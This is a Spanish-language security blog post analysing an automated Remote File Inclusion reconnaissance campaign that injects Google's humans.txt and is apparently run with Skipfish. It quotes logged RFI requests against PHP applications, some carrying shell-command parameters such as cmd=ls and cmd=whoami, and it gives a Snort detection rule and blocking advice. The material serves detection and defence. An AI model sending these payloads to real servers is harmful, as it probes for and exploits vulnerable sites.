En las últimas semanas, estamos detectando un aumento muy significativo de ataques de tipo Remote File Inclusión [1] en el que se repite el mismo patrón en el payload del ataque, y es que, la URL de inyección utilizada en esta campaña de ataques, es siempre la misma, http://www.google.es/humans.txt . Aunque el contenido de este fichero no es malicioso, la cantidad y frecuencia de las alertas que estamos detectando ponen de manifiesto que hay una campaña de ataques de reconocimiento en marcha.
Las direcciones IP atacantes tienen distintas ubicaciones en todo el mundo (se han detectado hasta 10 países implicados, incluido España), lo cual puede indicar que una o varias botnets están detrás de este tipo de ataque. De media, en un periodo de 10 días, cada una de estas IP han atacado unos 12 objetivos cada una generando entre 2000 y 5000 alertas en nuestros sensores cada una de ellas.
Por poner algún ejemplo, algunas de las peticiones detectadas contra los equipos atacados, son las siguientes:
GET /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.google.com/humans.txt? GET /123flashchat.php?e107path=http://www.google.com/humans.txt? HTTP/1.0 GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt? GET /A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt? GET /OpenSiteAdmin/scripts/classes/FieldManager.php?path=http://www.google.com/humans.txt?%00 GET /index.php?dir=http://www.google.com/humans.txt? GET /pollvote.php?pollname=http://www.google.com/humans.txt?&cmd=ls GET /rss.php?page[path]=http://www.google.com/humans.txt?&cmd=ls GET /phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.google.com/humans.txt? GET /rss.php?page[path]=http://www.google.com/humans.txt?&cmd=ls GET /arab3upload/customize.php?path=http://www.google.com/humans.txt?&cmd=pwd GET /ListRecords.php?lib_dir=http://www.google.com/humans.txt?&cmd=id GET/ea-gBook/index_inc.php?inc_ordner=http://www.google.com/humans.txt?&act=cmd&cmd=whoami&d= /&submit=1&cmd_txt=1
Todo indica que buscan recursos vulnerables de manera automática y utilizan como fichero de inyección el fichero humans.txt (no malicioso) de Google, cuyo contenido es el siguiente:
“Google is built by a large team of engineers, designers, researchers, robots, and others in many different sites across the globe. It is updated continuously, and built with more tools and technologies than we can shake a stick at. If you’d like to help us out, see google.com/jobs.”
Si el ataque ha tenido éxito, en el sitio atacado podrá leerse ese texto.
Parece ser que, en este caso la herramienta automática utilizada sea Skipfish, ya que envía www.google.com/humans.txt o www.google.com/humans.txt%00 para las pruebas que lleva a cabo de RFI.
Es evidente que los ciberdelincuentes están incrementando el uso de herramientas automáticas para llevar a cabo los ataques Web [2], y que generan una cantidad de tráfico malicioso muy importante en nuestros sensores, y es por tanto necesario saber cuales son las nuevas tendencias de ataque que puedan identificar este tipo de ataques automatizados para poder frenarlos afinando aún más las reglas de los sensores. Por lo general, las herramientas automatizadas pueden constituir un ataque de reconocimiento en el que el atacante está buscando aplicaciones o recursos vulnerables que atacará a posteriori en profundidad. Detectar a tiempo un ataque de reconocimiento permite identificar de forma más rápida vectores de ataque hacia otras de nuestras aplicaciones y permite la elaboración de listas negras de direcciones IP antes de que realmente comiencen a atacar.
En el caso del IDS Snort, la siguiente firma de Emerging Threats nos alertará de un ataque de este tipo:
#alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER PHP Generic Remote File Include Attempt (HTTP)"; flow:to_server,established; content:".php"; nocase; http_uri; content:"=http|3a|/"; nocase; http_uri; pcre:"/\x2Ephp\x3F.{0,300}\x3Dhttp\x3A\x2F[^\x3F\x26] +\x3F/Ui";reference:url,doc.emergingthreats.net/2009151; classtype:web-application-attack; sid:2009151; rev:7;)
Para saber si hemos sido víctimas vulnerables del ataque, una de las cosas que podemos hacer es comprobar si nuestro servidor se conecta a Google para obtener dicho fichero. Para bloquear este tipo de ataque en concreto podemos añadir alguna regla en nuestro WAF o IPS para que cualquier petición que incluya la cadena “www.google.com/humans.txt” sea bloqueada. No habría ningún falso positivo en estos casos.
Otra forma es intentar bloquear a Skipfish vía su User-Agent, que, para la versión 2.10b es “Mozilla/5.0 SF/2.10b” aunque ésto es manipulable y el atacante puede cambiarlo.
Según la documentación de esta tool, es capaz de realizar más de 500 peticiones por segundo contra recursos sensibles en Internet y más de 2000 peticiones por segundo sobre redes LAN/MAN. Se podría pensar en bloquear el tráfico que provenga con estas características.
Parece ser que esta campaña de ataques está siendo bastante extendida ya que incluso desde el CSIRT de Akamai han alertado recientemente sobre la misma, coincidiendo con nuestros indicios, aunque ellos comentan que los objetivos son sitios financieros y sin embargo en nuestro caso no hemos detectado que el ataque fuera dirigido a objetivos concretos sino de manera masiva.
[1] Un ataque RFI, es un ataque que permite a un atacante inyectar un fichero remoto, normalmente a través de un script, en un servidor Web. Este ataque puede conducir a robo o manipulación de datos, ejecución de código malicioso en el servidor Web, o ejecución de código malicioso en el lado de la aplicación del cliente (como por ejemplo JavaScript), que puede conllevar a otros ataques. Este ataque explota una vulnerabilidad provocada por la deficiente validación de datos de entrada del usuario.
[2] Según un estudio de Imperva de julio 2012 cifra que más de la mitad del tráfico malicioso detectado en ataques Web para los tipos de ataques más comunes (RFI, LFI,SQL Injection, Comment Spam, XSS y DirectoryTraversal) provenía de herramientas automáticas.
Muy interesante información.
Saludos